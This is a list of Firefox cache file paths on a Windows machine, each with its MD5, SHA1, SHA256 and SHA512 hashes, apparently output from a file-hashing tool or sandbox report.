SHA512 4bf916dc4c8f7a10df8a0c85a74ec64ae764e24b20bd0a7612826e84317ee79fb734ded597669be010c1364bfa1b8b4988efe05d084a2718acb87cbaab6fc1ff

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\entries\3A1485725BB37531A2001C4CC6DA67F980242435

MD5 82630eff54edfe38e9d5736fa9f2beec
SHA1 bada41ed6be4612e5d050b5da0b8d613109ac005
SHA256 5fb294548b5327eb9f0923fc641214a835c45889504c9b893ac4873aae7da6fe
SHA512 40e2f3f4541b616636d7b3b6987494d419d118a61226643b581a64b64c472944d2862a66944642fc8fa1985f24c8689f09a360570b79465d055e0ca9ad49c25b

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\entries\58141F9F89D46AD78DBA12C6B96B8398EFFDF6EA

MD5 77d6ac3e66ab0af714474eedd4433826
SHA1 e442a94df4789dc89714dfbbbff35a507c36a8bd
SHA256 e0877c11c7cb6aec9e89aa34ed48571ab523ec56f2c6818529793909766c628a
SHA512 b7e2233772538f1d6b98e0a564aed3bfbff3926575196b9ceb6b7ab79da0fd3b16169622ca7f2beff0e4a1e260f97ec31638afe249a8f3e72105cd4e6592d277

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\entries\8400691AB6C4DE72799176C51DA4200AD9AB963D

MD5 5130d3f3e5a4c65b6dd173902e47918f
SHA1 65171f289eac082d380c9a3ad9978767ff9832ea
SHA256 22f32c4feacbbc7a0b9a515ae052ecc5466017895d8afd63550a0633f18b3861
SHA512 ce2a9845a24a360ad3ab8a05a41271c60c99ca1cf9f438d2c06b247d76dda53410766231c9f07485ae78f3128b9073c4044460ba44b8eb4716c50f4421e1981d

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\entries\5223F76119195AE7AAD313BF9CB5180F294B1E63

MD5 669bb7226ccfda6eac19b6536d78c844
SHA1 793ce552d8636a9358b5f5b2ecb96d87e4ba1a58
SHA256 ff60f1263c8802ee0a88f655c98143441dd32af03a9565c248fb6b589d39ac66
SHA512 374e18d4f640378384a14d64c041ed8f93f08e4995769c2c229e460c4cb1972f6b92e636bd7780507929d1f6b2ce2a5b94ff9d62b6f4e17bec6b5b6d2516d8b8

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\entries\A3B41CE49D6A1812263F7813927615F6CE4C4110

MD5 5970c2e180da2e6b96fe1e1b6ca8ab9f
SHA1 c5d42756daee5361a0f5086794a77e41494e48f0
SHA256 7ac08743f1588db8888e09e4bcdbc273098fc043677ad7f03786baac0a3e917f
SHA512 57a88f5e8f3447931d45cba10bf30c90194328d04e2f3f65ce0b990671e4b5893199d9a794570467262c19da50e40a830c0337097d89e39029fd11c0b3e9b917

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\entries\D495DB5734A8C0F4624B62C4C0BD7955BFC1A588

MD5 9c9ae068e5b652b071785be42f6f91a2
SHA1 d85f16bf1bf75e5e3bade460b0d7ee58b72775ec
SHA256 3ca8c0cac0b46537c62faa60a80eeb3350d5f681c461517e996898da1be722c4
SHA512 0de5c7c12177ef4fdbc9749d01e6c1b63da346491c5a486cb06ae83b9e05d9e6bfca9832ad530dd2d5a39356c5089acd26f9549cd050e1c9e99362d9624ea1db

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\entries\D29550A6FA433E726F125B38F66390C5A7BB9F7A

MD5 6525be6017262b25c2296e8d3028ad38
SHA1 09b16416e60b437fd85b594677ab9fbcf91c38e4
SHA256 f8a247b5c4118fb5e00dd8f274804c642e906ced59cfcb807dce8f3129b283c6
SHA512 ed94c8f5de8fcf21c56ab3766fb2566322e0cca17585e5e79587293a4333526d952ee8c537e1ec0b19ef8891e59d0ebe34a7431abbd1db2003c6e4e6ca5a35ec

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\entries\B9D759A7070A9F97D578873A5BE056B5EFC6D70F

MD5 32afb51f14a93839c246a0b0e7d90ae9
SHA1 9086c6f1cf750e31ef1a30b2b5035016e0c56b8e
SHA256 62e931a905e03ec2c41b17f539eb94a0d7ee815db0f2c6c03b52faa63f7f46cb
SHA512 bd0128ad05d845ecaffe450b457becc89c09070a137f4465b3154aaf3202558a795c47cb72ed432701420b00acbb642185092a40c588958111d6fd4e5a1d1bc3

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\entries\1EEC49FBD05A4658E27FECE4195B8E31BA150BDE

MD5 93320903b5be576be0aa76cdcf6b10d2
SHA1 90f72541d7f9501fa02bcd47a39c04a351093687
SHA256 98d84e46b34c48bf6ec67b858edfd0e80221998dcb282dbf47fc1f4ef5b72897
SHA512 c0b15e7d8ccd0d8085e163fc29b4a90e36424ee31a2bef06bf6fde2a8ecbb01ee62d8495e4a3763f89e37d80cffc15fd1c49d15094c088a5b37ae1d9b981deb5

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\entries\E4A5360EAF7DA590B5316427680C6791D1348130

MD5 89a6b3fdce147ce02b35fc9c9f6a5a17
SHA1 167167145ead9d31350c410daa0f342751551449
SHA256 6a28df43b9f3cb9aa3be50324d31a36e82de36d5c579317aad4f1bb23680ea40
SHA512 b213e03ad1c264c1401cc78d9d053ff334af604400a21eb05b195f80cdc011e25ffec8c59e3d08ac1d3d6956fed30e1f21d8af832d6a1902585b120a455e23c5

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\entries\A752BE816C32A166B4212612D41570FEFDA0B4E8

MD5 d2cb44b29375d5547bf07d3f4514ce01
SHA1 07da4053f771aea4ab8aefb76742117d7869c8e3
SHA256 cf3eec1b51a0b3c7e71f61011a7e7ec3fff8e6c4eefd14316bbf53cdb762438c
SHA512 77834e2bbee95dd221cb2e924962e9da2d50f479b377d6f3db888b463fa6fd36d25057584f9a67deda22445f7b5f2d6124646cee31c08ffe31098c8fbee5e2fe